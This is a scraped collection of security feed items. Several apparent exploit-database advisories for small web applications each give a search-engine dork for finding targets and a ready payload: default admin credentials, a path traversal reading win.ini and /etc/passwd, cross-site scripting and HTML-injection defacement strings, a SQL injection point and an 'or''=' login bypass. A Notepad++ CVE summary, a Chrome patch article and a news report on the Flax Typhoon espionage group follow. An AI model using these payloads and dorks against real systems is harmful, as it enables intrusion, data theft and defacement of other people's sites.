Notepad++ is a free and open-source source code editor. Versions 8.5.6 and prior are vulnerable to global buffer read overflow in `CharDistributionAnalysis::HandleOneChar`. The exploitability of this issue is not clear. Potentially, it may be used to leak internal memory allocation information. As of time of publication, no known patches are available in existing versions of Notepad++.

CVE-2023-40036: GHSL-2023-112, GHSL-2023-102, GHSL-2023-103, GHSL-2023-092: Buffer Overflows in Notepad++ - CVE-2023-40031, CVE-2023-40036, CVE-2023-40164, CVE-2023-40166

Gusto Recipes Management version 1.5.1 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Gusto - Recipes Management v1.5.1 System Insecure Settings Vulnerability                                           || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://www.elmanawy.info/demo/gusto/                                                                              |  | # Dork      : /profile/1-gusto                                                                                                   |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] appears to leave a default administrative account in place post installation.[+] use Login : Email    : admin@admin.com                 Password : 123456 [+] http://127.0.0.1/mbc1org/admin/dashboard  Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Gusto Recipes Management 1.5.1 Insecure Settings

Groupoffice version 3.4.21 suffers from a directory traversal vulnerability.

    ====================================================================================================================================| # Title     : Groupoffice v3.4.21 Directory Traversal Vulnerability                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://www.group-office.com                                                                                         || # Dork      : Powered by Group-Office                                                                                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /compress.php?file=../../../../../../../../../../windows/win.ini[+] http://127.0.0.1/aa-hwkorg/compress.php?file=../../../../../../../etc/passwdGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Groupoffice 3.4.21 Directory Traversal

Grawlix CMS version 1.1.1 suffers from a cross site scripting vulnerability.

    ============================================================================================================================| # Title     : Grawlix Cms v1.1.1 xss Vulnerability                                                                       || # Author    : indoushka                                                                                                  || # Tested on : windows 10 Français V.(Pro)                                                                                || # Vendor    : http://getgrawlix.com/                                                                                     |  | # Dork      : Powered by The Grawlix CMS                                                                                 |============================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /_admin/panl.login.php?ref=/_admin/%27%22()%26%25%3Cacx%3E%3Cscript%3Ealert(/indoushka/);%3C/script%3E[+] http://127.0.0.1/obarandacom/_admin/panl.login.php?ref=/_admin/%27%22()%26%25%3Cacx%3E%3Cscript%3Ealert(/indoushka/);%3C/script%3E[+] php info : http://127.0.0.1/obarandacom/info.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Grawlix CMS 1.1.1 Cross Site Scripting

Gravigra CMS version 1.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Gravigra CMS v1.0 Sql injection Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://www.alwafaagroup.com/                                                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /news.php?nid=1 ( inject her )[+] use payload : http://127.0.0.1/gravigracom/news.php?nid=1 ( inject her )Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Gravigra CMS 1.0 SQL Injection

Global Domains International version 2.0 suffers from an html injection vulnerability.

    ====================================================================================================================================| # Title     : Global Domains International v2.0 HTML inject Vulnerability                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://www.worldsite.ws/                                                                                          || # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] infected File : /index.dhtml [+] use Payload : /index.dhtml?sponsor=gditrafficws'"()%26%25<acx><marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] https://127.0.0.1/worldsitews/index.dhtml?sponsor=gditrafficws'"()%26%25<acx><marquee><font color=lime size=32>Hacked by indoushka</font></marquee>Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Global Domains International 2.0 HTML Injection

GetSimple CMS version 3.3.2 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : GetSimple CMS v3.3.2 XSS Vulnerability                                                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://get-simple.info/                                                                                            || # Dork      :  © 2009-2014 GetSimple CMS – Version 3.3.2                                                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] LIne 5 Se7 y0ur T@rg3t .[+] XSS Reflected - Jquery v1.7.1 :<html><head>  <meta charset="utf-8">  <title>XSS Reflected - Jquery v1.7.1 </title>  <script src="http://127.0.0.1/GetSimpleCMS/admin/template/js/jquery.min.js"></script>  <script>    $(function() {      $('#users').each(function() {        var select = $(this);        var option = select.children('option').first();        select.after(option.text());        select.hide();      });    });  </script></head>  <body>  <form method="post">    <p>      <select id="users" name="users">        <option value="xssreflected"><script>alert(&#x27;xssreflected - jquery v1.7.1 by - indoushka thnx to @firebitsbr - mauro.risonho@gmail.com&#x27;);</script></option>      </select>    </p>  </form></body></html>Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

GetSimple CMS 3.3.2 Cross Site Scripting

G and G Corporate CMS version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : G&G Corporate CMS v1.0 Auth by Pass Vulnerability                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                             | | # Vendor    : http://gegweb.it                                                                                                   |  | # Dork      : intext:Powered by Studio G&G Corporate Communication site:it                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : User & Pass : 'or''='[+] http://wwwpriolinoxeu/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

G And G Corporate CMS 1.0 SQL Injection

Categories: Exploits and vulnerabilities
Tags: stable channel

Tags:  weekly updates

Tags:  CVE-2023-4427

Tags:  CVE-2023-4428

Tags:  CVE-2023-4429

Tags:  CVE-2023-4430

Tags:  CVE-2023-4431

Tags:  use after free

Tags:  out of bounds

Tags:  heap corruption

The first of Chrome's now weekly security updates fixes five vulnerabilities.



(Read more...)




The post Update now! Google Chrome's first weekly update has arrived appeared first on Malwarebytes Labs.

Google has published details about the first weekly update for the Chrome browser. Recently Google announced that it would start shipping weekly security updates for the Stable channel (the version most of us use). Regular Chrome releases will still come every four weeks, but to get security fixes out faster, updates to address security and other high impact bugs will be scheduled weekly.

This should also help in the reduction of a patch gap in the Chome release cycle. When a Chrome security bug is fixed, the fix is added to the public Chromium source code repository. The fix is then tested and evaluated before it goes to the Stable Channel. The gap is the time between the patch appearing in the Chromium repository and it being shipped in a Stable channel update.

The latest update has fixes for five vulnerabilities. Four of these vulnerabilities have been classified with a High importance and one as Medium. All these vulnerabilities have been reported by external researchers between August 1 and August 7, 2023.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The CVEs patched in these updates are:

CVE-2023-4430, a use after free (UAF) vulnerability in Vulkan, in Google Chrome prior to 116.0.5845.110, which allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. Vulkan is a modern cross-platform graphics and compute API (application programming interface) that provides high-efficiency, low-level access to modern GPUs (graphics processing units) used in a wide variety of devices from PCs to smartphones.

UAF is a type of vulnerability that is the result of the incorrect use of dynamic memory during a program’s operation. If, after freeing a memory location, a program does not clear the pointer to that memory, an attacker can use the error to manipulate the program.

Heap corruption occurs when a program modifies the contents of a memory location outside of the memory allocated to the program.

CVE-2023-4429 is another use after free vulnerability, this time in Loader, in Google Chrome prior to 116.0.5845.110, which allows a remote attacker to potentially exploit heap corruption via a crafted HTML page.

CVE-2023-4428 is an out of bounds memory access in CSS, in Google Chrome prior to 116.0.5845.110, which allows a remote attacker to perform an out of bounds memory read via a crafted HTML page.

An out-of-bounds write or read flaw makes it possible to manipulate parts of the memory which are allocated to more critical functions.

CVE-2023-4427 is an out of bounds memory access in V8, Google’s open-source JavaScript engine, in Google Chrome prior to 116.0.5845.110, which allows a remote attacker to perform an out of bounds memory read via a crafted HTML page.

CVE-2023-4431 is the vulnerability listed as Medium severity. It's an out of bounds memory access vulnerability in Fonts in Google Chrome prior to 116.0.5845.110, which allows a remote attacker to perform an out of bounds memory read via a crafted HTML page.

**How to protect yourself**

If you’re a Chrome user on Windows, Mac, or Linux, you should update  to version 116.0.5845.110/.111 at your earliest convenience.

The easiest way to update Chrome is to allow it to update automatically, which basically uses the same method as outlined below but does not require your attention. But you can end up lagging behind if you never close the browser or if something goes wrong—such as an extension stopping you from updating the browser.

So, it doesn’t hurt to check now and then. And now would be a good time, given the severity of the vulnerabilities in this batch. My preferred method is to have Chrome open the page chrome://settings/help which you can also find by clicking **Settings > About Chrome**.

If there is an update available, Chrome will notify you and start downloading it. Then all you have to do is **relaunch** the browser in order for the update to complete.

_Google Chrome is up to date_

After the update, your version should be 116.0.5845.110 for Mac and Linux, and 116.0.5845.111 for Windows, or later.

**We don’t just report on vulnerabilities—we identify them, and prioritize action.**

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using Malwarebytes Vulnerability and Patch Management.

Update now! Google Chrome's first weekly update has arrived

A nation-state activity group originating from China has been linked to cyber attacks on dozens of organizations in Taiwan as part of a suspected espionage campaign.
The Microsoft Threat Intelligence team is tracking the activity under the name Flax Typhoon, which is also known as Ethereal Panda.
"Flax Typhoon gains and maintains long-term access to Taiwanese organizations' networks with minimal

A nation-state activity group originating from China has been linked to cyber attacks on dozens of organizations in Taiwan as part of a suspected espionage campaign.

The Microsoft Threat Intelligence team is tracking the activity under the name **Flax Typhoon**, which is also known as Ethereal Panda.

"Flax Typhoon gains and maintains long-term access to Taiwanese organizations' networks with minimal use of malware, relying on tools built into the operating system, along with some normally benign software to quietly remain in these networks," the company said.

It further said it hasn't observed the group weaponize the access to conduct data-collection and exfiltration. A majority of the targets include government agencies, educational institutions, critical manufacturing, and information technology organizations in Taiwan.

A smaller number of victims have also been detected in Southeast Asia, North America, and Africa. The group is suspected to have been active since mid-2021.

"Ethereal Panda operations primarily focus on entities in the academic, technology, and telecommunications sectors in Taiwan," CrowdStrike notes in its description of the hacker crew. "Ethereal Panda relies heavily on SoftEther VPN executables to maintain access to victim networks, but has also been observed deploying the GodZilla web shell."

The primary focus of the actor revolves around persistence, lateral movement, and credential access, with the actor employing living-off-the-land (LotL) methods and hands-on keyboard activity to realize its goals.

The modus operandi is in line with threat actors' practice of continually updating their approaches to evade detection, banking on available tools in the target environment to avoid unnecessary download and creation of custom components.

Initial access is facilitated by means of exploiting known vulnerabilities in public-facing servers and deploying web shells like China Chopper, followed by establishing persistent access over Remote Desktop Protocol (RDP), deploy a VPN bridge to connect to a remote server, and harvest credentials using Mimikatz.

A noteworthy aspect of the attacks is the modification of the Sticky Keys behavior to launch Task Manager, enabling Flax Typhoon to conduct post-exploitation on the compromised system.

"In cases where Flax Typhoon needs to move laterally to access other systems on the compromised network, the actor uses LOLBins, including Windows Remote Management (WinRM) and WMIC," the Windows maker said.

The development comes three months after Microsoft exposed another China-linked actor named Volt Typhoon (aka Bronze Silhouette or Vanguard Panda), which has been observed exclusively relying on LotL techniques to fly under the radar and exfiltrate data.

While crossover of tactics and infrastructure among threat actors operating out of China isn't unusual, the findings paint the picture of a constantly evolving threat landscape, with adversaries shifting their tradecraft to become more selective in their follow-on operations.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#windows